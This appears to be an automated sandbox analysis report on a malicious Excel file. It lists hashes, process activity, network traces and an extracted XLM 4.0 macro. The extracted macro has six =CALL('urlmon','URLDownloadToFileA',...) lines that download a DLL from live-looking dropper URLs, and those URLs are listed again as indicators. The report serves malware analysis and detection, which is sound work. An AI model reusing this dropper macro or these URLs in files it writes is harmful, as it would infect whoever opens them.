
Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags
    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    21/11/2024, 00:17 UTC

General

  • Target

    65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls

  • Size

    126KB

  • MD5

    fda0b9d321be17519d9edc011dc4b0a8

  • SHA1

    5c37cf50381e7b02f9ddcde6bc04805a71bce0a8

  • SHA256

    65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4

  • SHA512

    2e0d49366722a914c379c78157035c1316f8212e92edaec9df57ec100c47f3e3b3e43eff19e0d6a6a749a090fd34843a0b545144f642bd49fd9cf3850f39861c

  • SSDEEP

    3072:LsKpbdrHYrMue8q7QPX+5xtekEdi8/dgR3Syz+nzQIceCRlCd:QKpbdrHYrMue8q7QPX+5xtFEdi8/dgR8

Score
10/10

Malware Config

Extracted

Language
xlm4.0

Source
1. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/", "..\fbd.dll")
2. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://izytalab.com/includes/1mafAX0kOa/", "..\fbd.dll")
3. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://pcsolutionss.com/zSlT4HR92TiOpw5NM/", "..\fbd.dll")
4. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/", "..\fbd.dll")
5. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://wpl28.realtyna.com/wp-content/0b0ny5cPM/", "..\fbd.dll")
6. =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.efcballjoint.com/Template/AxEZPOfAa9/", "..\fbd.dll")
URLs

  • xlm40.dropper
    http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/
  • xlm40.dropper
    http://izytalab.com/includes/1mafAX0kOa/
  • xlm40.dropper
    https://pcsolutionss.com/zSlT4HR92TiOpw5NM/
  • xlm40.dropper
    http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
  • xlm40.dropper
    https://wpl28.realtyna.com/wp-content/0b0ny5cPM/
  • xlm40.dropper
    http://www.efcballjoint.com/Template/AxEZPOfAa9/

Signatures

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\65a6a5d6988fe0e1ac5a5bf6e145046f4f074ce1f459786aaac6629ec01891b4.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2344

Network

  • flag-us
    DNS
    med.devsrm.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    med.devsrm.com
    IN A
    Response
    med.devsrm.com
    IN A
    143.95.229.88
  • flag-us
    GET
    http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/
    EXCEL.EXE
    Remote address:
    143.95.229.88:80
    Request
    GET /wp-content/gtOOTHi3zkUbn8U6/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: med.devsrm.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:51 GMT
    Server: Apache
    Vary: accept,content-type,Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://aleksasphotoblog.de/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Content-Encoding: gzip
    Keep-Alive: timeout=5, max=75
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    izytalab.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    izytalab.com
    IN A
    Response
  • flag-us
    DNS
    pcsolutionss.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    pcsolutionss.com
    IN A
    Response
    pcsolutionss.com
    IN A
    204.15.133.228
  • flag-us
    GET
    https://pcsolutionss.com/zSlT4HR92TiOpw5NM/
    EXCEL.EXE
    Remote address:
    204.15.133.228:443
    Request
    GET /zSlT4HR92TiOpw5NM/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: pcsolutionss.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:56 GMT
    Server: Apache
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    www.doctorcasenave.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.doctorcasenave.com
    IN A
    Response
    www.doctorcasenave.com
    IN A
    172.67.203.60
    www.doctorcasenave.com
    IN A
    104.21.44.190
  • flag-us
    GET
    http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    EXCEL.EXE
    Remote address:
    172.67.203.60:80
    Request
    GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.doctorcasenave.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 21 Nov 2024 00:17:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsfV5OA%2B31ffY3vYmF4mudrBZdtTHxkpuuKuunAWaoyrYA5bKxMQBeIqZvkQhPg4TnOI6cBZnunmz6vWsxC0ob%2FK78qqMHxPKlCsq1JLM2bAxJkEVlDmqKnlgAqxLmHxFY8l6jKFk61V"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5c7fe6c8533695-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60445&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=349&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    doctorcasenave.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    doctorcasenave.com
    IN A
    Response
    doctorcasenave.com
    IN A
    172.67.203.60
    doctorcasenave.com
    IN A
    104.21.44.190
  • flag-us
    GET
    http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    EXCEL.EXE
    Remote address:
    172.67.203.60:80
    Request
    GET /wp-content/O2Z1HMebIXiHYBBS/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: doctorcasenave.com
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 21 Nov 2024 00:17:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://doctorcasenave.com/wp-json/>; rel="https://api.w.org/"
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYcPvUrMcWy3gQC5RPxBV2tCmrgb9VSHSmPsuj71jWALudVmkbU%2Bcy1q0%2B%2BJHr7lSwFOvjvtFySgol4wV%2FI%2Fis%2BojrP%2B2Yy7ZfT2Dpiaq3TmB2AyfXYELbT3im19n5wTuvO1yQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5c7fea2e51ef54-LHR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=60143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=345&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    wpl28.realtyna.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    wpl28.realtyna.com
    IN A
    Response
    wpl28.realtyna.com
    IN A
    54.173.39.27
  • flag-us
    DNS
    www.efcballjoint.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.efcballjoint.com
    IN A
    Response
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Thu, 21 Nov 2024 00:18:26 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV3b45ffe8.0
    ms-cv-esi: CASMicrosoftCV3b45ffe8.0
    X-RTag: RT
  • 143.95.229.88:80
    http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/
    http
    EXCEL.EXE
    1.4kB
    28.7kB
    22
    24

    HTTP Request

    GET http://med.devsrm.com/wp-content/gtOOTHi3zkUbn8U6/

    HTTP Response

    404
  • 204.15.133.228:443
    https://pcsolutionss.com/zSlT4HR92TiOpw5NM/
    tls, http
    EXCEL.EXE
    1.2kB
    4.8kB
    11
    9

    HTTP Request

    GET https://pcsolutionss.com/zSlT4HR92TiOpw5NM/

    HTTP Response

    404
  • 172.67.203.60:80
    http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    http
    EXCEL.EXE
    625 B
    1.1kB
    6
    4

    HTTP Request

    GET http://www.doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

    HTTP Response

    301
  • 172.67.203.60:80
    http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/
    http
    EXCEL.EXE
    621 B
    4.2kB
    6
    5

    HTTP Request

    GET http://doctorcasenave.com/wp-content/O2Z1HMebIXiHYBBS/

    HTTP Response

    404
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    399 B
    179 B
    5
    4
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    361 B
    219 B
    5
    5
  • 54.173.39.27:443
    wpl28.realtyna.com
    tls
    EXCEL.EXE
    288 B
    219 B
    5
    5
  • 54.173.39.27:443
    wpl28.realtyna.com
    EXCEL.EXE
    190 B
    132 B
    4
    3
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 8.8.8.8:53
    med.devsrm.com
    dns
    EXCEL.EXE
    60 B
    76 B
    1
    1

    DNS Request

    med.devsrm.com

    DNS Response

    143.95.229.88

  • 8.8.8.8:53
    izytalab.com
    dns
    EXCEL.EXE
    58 B
    131 B
    1
    1

    DNS Request

    izytalab.com

  • 8.8.8.8:53
    pcsolutionss.com
    dns
    EXCEL.EXE
    62 B
    78 B
    1
    1

    DNS Request

    pcsolutionss.com

    DNS Response

    204.15.133.228

  • 8.8.8.8:53
    www.doctorcasenave.com
    dns
    EXCEL.EXE
    68 B
    100 B
    1
    1

    DNS Request

    www.doctorcasenave.com

    DNS Response

    172.67.203.60
    104.21.44.190

  • 8.8.8.8:53
    doctorcasenave.com
    dns
    EXCEL.EXE
    64 B
    96 B
    1
    1

    DNS Request

    doctorcasenave.com

    DNS Response

    172.67.203.60
    104.21.44.190

  • 8.8.8.8:53
    wpl28.realtyna.com
    dns
    EXCEL.EXE
    64 B
    80 B
    1
    1

    DNS Request

    wpl28.realtyna.com

    DNS Response

    54.173.39.27

  • 8.8.8.8:53
    www.efcballjoint.com
    dns
    EXCEL.EXE
    66 B
    139 B
    1
    1

    DNS Request

    www.efcballjoint.com

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabEE77.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarEEA9.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2344-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2344-1-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB

  • memory/2344-52-0x000000007284D000-0x0000000072858000-memory.dmp

    Filesize

    44KB
